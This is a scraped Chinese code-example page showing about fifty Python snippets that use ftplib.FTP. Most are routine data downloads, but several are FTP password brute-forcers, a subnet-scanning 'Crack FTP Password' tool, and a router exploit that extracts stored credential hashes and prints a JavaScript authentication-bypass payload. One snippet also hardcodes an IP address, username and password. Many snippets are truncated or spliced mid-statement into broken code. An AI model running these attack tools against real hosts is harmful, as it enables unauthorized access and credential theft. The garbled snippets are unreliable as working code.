Python ftplib 模块,FTP 实例源码
我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用ftplib.FTP。
def redirect_internal(self, url, fp, errcode, errmsg, headers, data):
if 'location' in headers:
newurl = headers['location']
elif 'uri' in headers:
newurl = headers['uri']
else:
return
void = fp.read()
fp.close()
# In case the server sent a relative URL,join with original:
newurl = basejoin(self.type + ":" + url, newurl)
# For security reasons we do not allow redirects to protocols
# other than HTTP,HTTPS or FTP.
newurl_lower = newurl.lower()
if not (newurl_lower.startswith('http://') or
newurl_lower.startswith('https://') or
newurl_lower.startswith('ftp://')):
raise IOError('redirect error',
errmsg + " - Redirection to url '%s' is not allowed" %
newurl,
headers)
return self.open(newurl)
def create_folder(folder):
try:
folder = xbmc.makeLegalFilename(folder)
control.makeFile(folder)
try:
if not 'ftp://' in folder: raise Exception()
from ftplib import FTP
ftparg = re.compile('ftp://(.+?):(.+?)@(.+?):?(\d+)?/(.+/?)').findall(folder)
ftp = FTP(ftparg[0][2], ftparg[0][0], ftparg[0][1])
try:
ftp.cwd(ftparg[0][4])
except:
ftp.mkd(ftparg[0][4])
ftp.quit()
except:
pass
except:
pass
def setup_module(module):
# enter test directory
os.chdir('pycoal/tests')
# download spectral library over FTP if necessary
if not os.path.isfile(libraryFilenames[0]) and \
not os.path.isfile(libraryFilenames[1]):
ftp_url = "ftpext.cr.usgs.gov"
ftp_dir = "pub/cr/co/denver/speclab/pub/spectral.library/splib06.library/Convolved.libraries/"
ftp = ftplib.FTP(ftp_url)
ftp.login()
ftp.cwd(ftp_dir)
for f in libraryFilenames:
with open("" + f, "wb") as lib_f:
ftp.retrbinary('RETR %s' % f, lib_f.write)
# tear down test module after running tests
def update_sideshow_file(fname,
server_fname,
server=SIDESHOW_SERVER,
temp_path=gettempdir()):
"""
Update the jpl side show file stored locally at *fname*. The
remote file is accessed via FTP on *server* at *server_fname*. The
path *temp_path* is used to store intermediate files. Return
*fname*.
"""
dest_fname = replace_path(temp_path, server_fname)
logger.info('opening connection to {}'.format(server))
with closing(FTP(server)) as ftp, open(dest_fname, 'w') as fid:
logger.info('logging in')
ftp.login()
logger.info('writing to {}'.format(dest_fname))
ftp.retrbinary('RETR ' + server_fname, fid.write)
logger.info('uncompressing file to {}'.format(fname))
with GzipFile(dest_fname) as gzip_fid, open(fname, 'w') as fid:
fid.write(gzip_fid.read())
return fname
def workhorse(ipaddr, user, word):
user = user.replace("\n","")
word = word.replace("\n","")
try:
print "-"*12
print "User:",user,"Password:",word
ftp = FTP(ipaddr)
ftp.login(user, word)
ftp.retrlines('LIST')
print "\t\n[!] Login successful:", word
if txt != None:
save_file.writelines(user+" : "+word+" @ "+ipaddr+":21\n")
ftp.quit()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "[-] An error occurred:",msg
pass
def brute(ipaddr):
print "-"*30
print "\n[+] Attempting BruteForce:",ipaddr,"\n"
try:
f = FTP(ipaddr)
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login:","\n"
ftp = FTP(ipaddr)
ftp.login()
ftp.retrlines('LIST')
print "\t\n[!] Anonymous login successful!!!\n"
if txt != None:
save_file.writelines("Anonymous:"+ipaddr+":21\n")
ftp.quit()
except (ftplib.all_errors):
print "[-] Anonymous login unsuccessful\n"
for user in users:
for word in words:
work = threading.Thread(target = workhorse, args=(ipaddr, word)).start()
time.sleep(1)
def redirect_internal(self, data):
if 'location' in headers:
newurl = headers['location']
elif 'uri' in headers:
newurl = headers['uri']
else:
return
fp.close()
# In case the server sent a relative URL,
headers)
return self.open(newurl)
def __init__(self, hostname, root_path, base_url,
username=None, password=None, passive=True, secure=False, **kwargs):
if isinstance(hostname, FTP):
self.ftp_client = hostname
else: # pragma: nocover
if secure:
self.ftp_client = FTP_TLS(host=hostname, user=username, passwd=password, **kwargs)
# noinspection PyUnresolvedReferences
self.ftp_client.prot_p()
else:
self.ftp_client = FTP(host=hostname, **kwargs)
self.ftp_client.set_pasv(passive)
self.root_path = root_path
self.base_url = base_url.rstrip('/')
def get_all_species(self):
import tempfile
outfile = tempfile.mktemp() + '.txt.gz'
try:
self.logger.info('Downloading "species.txt.gz"...')
out_f = open(outfile, 'wb')
ftp = FTP(self.__class__.ENSEMBL_FTP_HOST)
ftp.login()
species_file = '/pub/release-%s/MysqL/ensembl_production_%s/species.txt.gz' % (self.release, self.release)
ftp.retrbinary("RETR " + species_file, out_f.write)
out_f.close()
self.logger.info('Done.')
#load saved file
self.logger.info('Parsing "species.txt.gz"...')
species_li = tab2list(outfile, (1, 2, 7), header=0) # db_name,common_name,taxid
species_li = [x[:-1] + [is_int(x[-1]) and int(x[-1]) or None] for x in species_li]
# as of ensembl 87,there are also mouse strains. keep only the "original" one
species_li = [s for s in species_li if not s[0].startswith("mus_musculus_")]
self.logger.info('Done.')
finally:
os.remove(outfile)
pass
return species_li
def ftp_size(host_name, path):
from ftplib import FTP
try:
ftp = FTP(host_name)
except Exception as e:
print(e)
return -1
try:
ftp.login()
ftp.voidcmd('TYPE I')
size = ftp.size(path)
ftp.quit()
except Exception as e:
print(e)
return 0
return size
def list_children(self, path):
"""
Yield all direct children of the given root-relative path,as root-
relative paths. If the path refers to a file,there will be no children.
"""
if len(path) > 0 and not path.endswith("/"):
# We need a trailing slash after a real directory name for urljoin
# to work later
path = path + "/"
# Strip leading slashes from the input path,so we always look inside
# our base path.
path = path.lstrip("/")
# Construct the path to actually go to on the FTP server
ftp_path = urlparse.urljoin(self.base_path, path)
Logger.debug("Listing {}".format(ftp_path))
for child in robust_nlst(self.connection, ftp_path):
# For every child,build a root-relative URL
yield urlparse.urljoin(path, child)
def _download_latest_clinvar_xml(self, dest_dir):
ftp = FTP('ftp.ncbi.nlm.nih.gov')
ftp.login()
ftp.cwd(CV_XML_DIR)
# sort just in case the ftp lists the files in random order
cv_xml_w_date = sorted(
[f for f in ftp.nlst() if re.match(CV_XML_REGEX, f)])
if len(cv_xml_w_date) == 0:
raise CommandError('ClinVar reporting zero XML matching' +
' regex: \'{0}\' in directory {1}'.format(
CV_XML_REGEX, CV_XML_DIR))
ftp_xml_filename = cv_xml_w_date[-1]
dest_filepath = os.path.join(dest_dir, ftp_xml_filename)
with open(dest_filepath, 'w') as fh:
ftp.retrbinary('RETR {0}'.format(ftp_xml_filename), fh.write)
return dest_filepath, ftp_xml_filename
def get_data_Weather():
while True:
print("Input the data for the Wunderground weather API.\n")
API_KEY = input("API Key:\n")
COUNTRY = input("Country:\n")
CITY = input("City:\n")
CITY_code = check_weather(API_KEY,COUNTRY, CITY)
if CITY_code == False:
if y_n("Retry?") == False:
raise Exception("User abort on Weather Data select.")
else:
break
while True:
print("Input the data for the DWD FTP Server.\n")
dwdname = input("Username:\n")
dwdpass = input("Password:\n")
if not check_dwdftp(dwdname, dwdpass):
if y_n("Retry?") == False:
raise Exception("User abort on DWD FTP Server data input.")
else:
break
return InputWeather(API_KEY, CITY_code,dwdname,dwdpass)
def redirect_internal(self,
headers)
return self.open(newurl)
def set_aspera_variables(filepath):
try:
parser = SafeConfigParser()
parser.read(filepath)
global ASPERA_BIN
ASPERA_BIN = parser.get('aspera', 'ASPERA_BIN')
global ASPERA_PRIVATE_KEY
ASPERA_PRIVATE_KEY = parser.get('aspera', 'ASPERA_PRIVATE_KEY')
if not os.path.exists(ASPERA_PRIVATE_KEY):
print 'Private key file ({0}) does not exist. Defaulting to FTP transfer'.format(ASPERA_PRIVATE_KEY)
return False
global ASPERA_SPEED
ASPERA_SPEED = parser.get('aspera', 'ASPERA_SPEED')
global ASPERA_OPTIONS
ASPERA_OPTIONS = parser.get('aspera', 'ASPERA_OPTIONS')
return True
except Exception as e:
sys.stderr.write("ERROR: cannot read aspera settings from {0}.\n".format(filepath))
sys.stderr.write("{0}\n".format(e))
sys.exit(1)
def set_aspera(aspera_filepath):
aspera = True
if aspera_filepath is not None:
if os.path.exists(aspera_filepath):
aspera = set_aspera_variables(aspera_filepath)
else:
print 'Cannot find {0} file,defaulting to FTP transfer'.format(aspera_filepath)
aspera = False
elif os.environ.get('ENA_ASPERA_INIFILE'):
aspera = set_aspera_variables(os.environ.get('ENA_ASPERA_INIFILE'))
else:
if os.path.exists(os.path.join(enabrowserTools_path, 'aspera_settings.ini')):
aspera = set_aspera_variables(os.path.join(enabrowserTools_path, 'aspera_settings.ini'))
else:
print 'Cannot find aspera_settings.ini file,defaulting to FTP transfer'
aspera = False
return aspera
def set_aspera_variables(filepath):
try:
parser = SafeConfigParser()
parser.read(filepath)
global ASPERA_BIN
ASPERA_BIN = parser.get('aspera', 'ASPERA_PRIVATE_KEY')
if not os.path.exists(ASPERA_PRIVATE_KEY):
print('Private key file ({0}) does not exist. Defaulting to FTP transfer'.format(ASPERA_PRIVATE_KEY))
return False
global ASPERA_SPEED
ASPERA_SPEED = parser.get('aspera', 'ASPERA_OPTIONS')
return True
except Exception as e:
sys.stderr.write("ERROR: cannot read aspera settings from {0}.\n".format(filepath))
sys.stderr.write("{0}\n".format(e))
sys.exit(1)
def set_aspera(aspera_filepath):
aspera = True
if aspera_filepath is not None:
if os.path.exists(aspera_filepath):
aspera = set_aspera_variables(aspera_filepath)
else:
print('Cannot find {0} file,defaulting to FTP transfer'.format(aspera_filepath))
aspera = False
elif os.environ.get('ENA_ASPERA_INIFILE'):
aspera = set_aspera_variables(os.environ.get('ENA_ASPERA_INIFILE'))
else:
if os.path.exists(os.path.join(enabrowserTools_path, 'aspera_settings.ini'))
else:
print('Cannot find aspera_settings.ini file,defaulting to FTP transfer')
aspera = False
return aspera
def _get_ftp_connection(self):
for _ in range(self.n_tries):
try:
ftp = ftplib.FTP("ftp.ncdc.noaa.gov")
except ftplib.all_errors as e:
logger.warn("FTP connection issue: %s", e)
else:
logger.info(
"Successfully established connection to ftp.ncdc.noaa.gov."
)
try:
ftp.login()
except ftplib.all_errors as e:
logger.warn("FTP login issue: %s", e)
else:
logger.info(
"Successfully logged in to ftp.ncdc.noaa.gov."
)
return ftp
raise RuntimeError("Couldn't establish an FTP connection.")
def run(config, status):
"""
Job to recursively download a directory from an FTP server
This will overwrite any files that are in the dest_root directory
"""
ftp_addr = config.get(KEYS.SERVER_ADDRESS, "localhost")
ftp_port = config.get(KEYS.SERVER_PORT, 21)
ftp_root = config.get(KEYS.FTP_ROOT, "/")
dest_root = config.get(KEYS.DEST_ROOT, "C:\\temp\\")
user = config.get(KEYS.USERNAME, "")
password = config.get(KEYS.PASSWORD, "")
try:
ftp_session = FTP()
ftp_session.connect(ftp_addr, ftp_port)
ftp_session.login(user, password)
except socket.gaierror, e:
status.update({"error": str(e)})
logger.error(e)
return
logger.debug("connected {0}")
download_files(ftp_session, ftp_root, dest_root, status)
ftp_session.close()
def get_ftp_instance(base_url):
"""
Get ftplib.FTP object that is connected to base_url.
Returns
-------
ftplib.FTP
FTP object connected to base_url.
"""
try:
ftp = ftplib.FTP(base_url)
ftp.login()
return ftp
except Exception:
raise ConnectionError('Problems connecting to ENSEMBL FTP server.')
# pylint: disable=redefined-outer-name
def create_folder(folder):
try:
folder = xbmc.makeLegalFilename(folder)
control.makeFile(folder)
try:
if not 'ftp://' in folder: raise Exception()
from ftplib import FTP
ftparg = re.compile('ftp://(.+?):(.+?)@(.+?):?(\d+)?/(.+/?)').findall(folder)
ftp = FTP(ftparg[0][2], ftparg[0][1])
try:
ftp.cwd(ftparg[0][4])
except:
ftp.mkd(ftparg[0][4])
ftp.quit()
except:
pass
except:
pass
def attemptLogin(self, credential):
success = False
Hive.attemptLogin(self, credential)
username = credential.username
password = credential.password
host = credential.host
try:
self.ftp = FTP(host)
result = self.ftp.login(username,password)
# If result then this was a successful login
if result:
success = True
self.ftp.close()
except:
pass
return success
# function: setup
# description: Prepares this Hive for its attack,*NOTE* This must be called before start is called
def try_login(custom_users, custom_passwords, host, port):
for user in custom_users:
for password in custom_passwords:
try:
con = ftplib.FTP(timeout=3.5)
con.connect(host, port)
ans = con.login(user,password)
if "230" in ans:
anon_login = "Success ({} - {})".format(user, password)
dir_listing = get_directory_listing(con)
return (anon_login, dir_listing)
else:
con.quit()
con.close()
continue
except socket.timeout:
anon_login = "Timed out"
return (anon_login, None)
except Exception as e:
anon_login = "disallowed"
return (anon_login, None)
def create_folder(folder):
try:
folder = xbmc.makeLegalFilename(folder)
control.makeFile(folder)
try:
if not 'ftp://' in folder: raise Exception()
from ftplib import FTP
ftparg = re.compile('ftp://(.+?):(.+?)@(.+?):?(\d+)?/(.+/?)').findall(folder)
ftp = FTP(ftparg[0][2], ftparg[0][1])
try:
ftp.cwd(ftparg[0][4])
except:
ftp.mkd(ftparg[0][4])
ftp.quit()
except:
pass
except:
pass
def main():
p = argparse.ArgumentParser(usage='''
python ftp.py --host 127.0.0.1
python ftp.py --host 127.0.0.1 --file password.txt
python ftp.py --host 192.168.4 --file password.txt -C Scan''',description='Crack FTP Password')
p.add_argument('-host','--host',help='Input TarGet IP or Scan C network :192.168.4')
p.add_argument('-f','--file',help='Input Password File')
p.add_argument('-C',help='Scan C network')
args = p.parse_args()
host = args.host
password = args.file
C_Network = args.C
if password == None or password == None:
anon_login(host)
elif C_Network == "Scan":
ip_C(host,password)
else:
CrackFtpLogin(host,password)
def redirect_internal(self,
headers)
return self.open(newurl)
def ftp(config, host):
"""
Check a hosts FTP service
:param config: dictionary containing settings
config['vars']['ftp_timeout']: The timeout in seconds to wait for the
ftp connection to complete by
:param host: The host to connect to over FTP
:return: 3-tuple of (success,name,message)
success: Boolean value indicating if there is a problem or not
name: DNS name
message: String describing the status
"""
name = host
try:
ftp_conn = FTP(host=host,
timeout=config['vars']['ftp_timeout'])
except Exception as e:
return False, name, "Exception %s %s" % (e.__class__, e)
welcome = ftp_conn.getwelcome()
ftp_conn.quit()
return True, "FTP ok %s" % welcome
def getftpconnect():
ftp_server = '121.69.75.194'
username = 'wac'
password = '8112whz'
ftp = FTP()
#ftp.set_debuglevel(2) # ??????2???????
ftp.connect(ftp_server, 22) # ??
ftp.login(username, password) # ?????????????????
print ftp.getwelcome()
return ftp
def _connect(self):
self.__conn = ftplib.FTP()
self.__conn.set_pasv(True)
self.__conn.connect(host=self.url.host, port=self.url.port or 21, timeout=self.TIMEOUT)
if self.url.user:
self.__conn.login(user=self.url.user, passwd=self.url.password or '')
self.__conn.voidcmd('TYPE I')
if transfert.conf.__verbosity__:
self.__conn.set_debuglevel(2)
if self.isdir():
self.__conn.cwd(self.url.path)
else:
self.__conn.cwd('/'.join(self.url.path.split('/')[:-1]))
def downloadFullDataset(cls, out_file=None, use_file=None):
'''
Download GLDAS data
@param out_file: Output filename for parsed data
@param use_file: Directory of downloaded data. If None,data will be downloaded.
@return Absolute path of parsed data
'''
# No post processing for this data is necessary. If local data is
# specified,just set its location.
if use_file != None:
print('Setting data location for local data')
return os.path.abspath(use_file)
# If no local data,download data from server
print("Downloading GLDAS Land Mass Data")
ftp = FTP("podaac-ftp.jpl.nasa.gov")
ftp.login()
ftp.cwd('allData/tellus/L3/gldas_monthly/netcdf/')
dir_list = list(ftp.nlst(''))
file_list = [file for file in dir_list if re.search('.nc$', file)]
if len(file_list) > 1:
raise ValueError('Too many files found in GLDAS directory')
if out_file == None:
out_file = file_list[0]
ftp.retrbinary('RETR ' + file_list[0], open(''+out_file, 'wb').write)
cls.setDataLocation('gldas', os.path.abspath(file_list[0]))
def open_file(self, url):
"""Use local file or FTP depending on form of URL."""
if not isinstance(url, str):
raise IOError, ('file error', 'proxy support for file protocol currently not implemented')
if url[:2] == '//' and url[2:3] != '/' and url[2:12].lower() != 'localhost/':
return self.open_ftp(url)
else:
return self.open_local_file(url)
def ftperrors():
"""Return the set of errors raised by the FTP class."""
global _ftperrors
if _ftperrors is None:
import ftplib
_ftperrors = ftplib.all_errors
return _ftperrors
def init(self):
import ftplib
self.busy = 0
self.ftp = ftplib.FTP()
self.ftp.connect(self.host, self.port, self.timeout)
self.ftp.login(self.user, self.passwd)
for dir in self.dirs:
self.ftp.cwd(dir)
def send_ftp(file_name=None):
'''Sends the file_name (which should be a closed file object) to the server for storage.'''
if file_name == None: file_name = STANDARD_FILE_NAME
f = open(file_name, 'rb')
server = ftplib.FTP(FTP_SERVER, USER_NAME, PASSWORD)
server.storbinary("STOR " + STANDARD_FILE_NAME, f)
f.close()
server.quit()
def fetch(source,
dates,
stns,
rinex_type='obs',
template_map=TEMPLATE_MAP,
local_path='./',
local_template='{stn}{date:%j}0.{date:%y}{suffix}'):
"""
???
"""
server, template, suffix = TEMPLATE_MAP[source][rinex_type]
fname_map = defaultdict(dict)
logger.info('opening connection to {}'.format(server))
with closing(FTP(server)) as ftp:
ftp.login()
for date in dates:
for stn in stns:
remote_fname = template.format(date=date, stn=stn) + suffix
local_fname = os.path.join(local_path.format(date=date, stn=stn, suffix=suffix),
local_template.format(date=date, suffix=suffix))
logger.info('fetching {} and storing to {}'.format(remote_fname,
local_fname))
touch_path(os.path.dirname(local_fname))
with open(local_fname, 'w') as fid:
try:
ftp.retrbinary('RETR {}'.format(remote_fname),
fid.write)
fname_map[date][stn] = local_fname
except Exception as e:
logger.warning('Could not fetch {} ({}) --- skipping'.format(remote_fname,
e))
os.remove(local_fname)
continue
for date in sorted(fname_map):
for stn in sorted(fname_map[date]):
fname_map[date][stn] = decompress(fname_map[date][stn])
return fname_map
def upload(self, project_name, filename, dst_filename = None):
if dst_filename == None:
dst_filename = os.path.split(filename)[-1]
ftp = FTP()
ftp.connect(self.server_host, self.ftp_port)
ftp.login()
filename_to_write_to = os.path.join(project_name, dst_filename)
ftp.storbinary('STOR ' + filename_to_write_to, open(filename, 'rb'))
ftp.close()
return "uploaded"
def _connect(self):
try:
if not self.ftp:
self.ftp = FTP()
self.ftp.connect(self.config['host'], self.config['ftp']['port'], self.config['ftp']['timeout'])
self.ftp.login(self.config['ftp']['user'], self.config['ftp']['password'])
except Exception, e:
raise AveException({'message': 'Could not login FTP server: %s' % (str(e))})
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],value
ftp = FTP(ip)
ftp.login(user[:-1], value)
ftp.retrlines('LIST')
print "\t\nLogin successful:", value
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:",msg
pass
def BruteForce(word) :
print "[?]Trying :",word
file.write("\n[?]Trying :"+word)
try:
ftp = FTP(hostname)
ftp.login(user, word)
ftp.retrlines('list')
ftp.quit()
print "\n\t[!] Login Success ! "
print "\t[!] Username : ", ""
print "\t[!] Password : ",word, ""
print "\t[!] Hostname : ",hostname, ""
print "\t[!] Log all has been saved to",log,"\n"
file.write("\n\n\t[!] Login Success ! ")
file.write("\n\t[!] Username : "+user )
file.write("\n\t[!] Password : "+word )
file.write("\n\t[!] Hostname : "+hostname)
file.write("\n\t[!] Log all has been saved to "+log)
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",value
ftp = FTP(sys.argv[1])
ftp.login(user,value, user
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors),msg
pass
def run(self):
value = getword()
try:
print "-"*12
print "User:",value
ftp = FTP(ipaddr[0])
ftp.login(user[:-1], msg:
print "An error occurred:", msg
pass
def server(self, server):
"""Set the server for the ftp stats. Has to be a link
example:
[p]ftpset server ftp.yoursite.com
DON'T ADD FTP://!"""
self.settings['ftp_server'] = server
dataIO.save_json("data/ftpstats/settings.json", self.settings)
await self.bot.say("Done!")
def run(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
print_status("FTP and HTTP service active")
creds = self.ftp_get_config()
if creds:
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "{}"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
elif '}=>' in response:
print_success("Successful authentication through Telnet service")
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
tn.interact()
else:
print_error("Exploit Failed - target seems to be not vulnerable")
def ftp_get_config(self):
print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
self.ftp_port,
self.remote_user,
self.remote_pass))
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
ftp.login(self.remote_user, self.remote_pass)
print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
if self.config_path in ftp.nlst():
print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
r = StringIO()
ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
ftp.close()
data = r.getvalue()
creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
if creds:
print_success("Found encrypted credentials:")
print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
return creds
else:
print_error("Exploit Failed - Could not find any credentials")
except ftplib.all_errors:
print_error("Exploit Failed - FTP error")
return None
def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ftp.close()
return
except Exception:
pass
ftp.close()
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。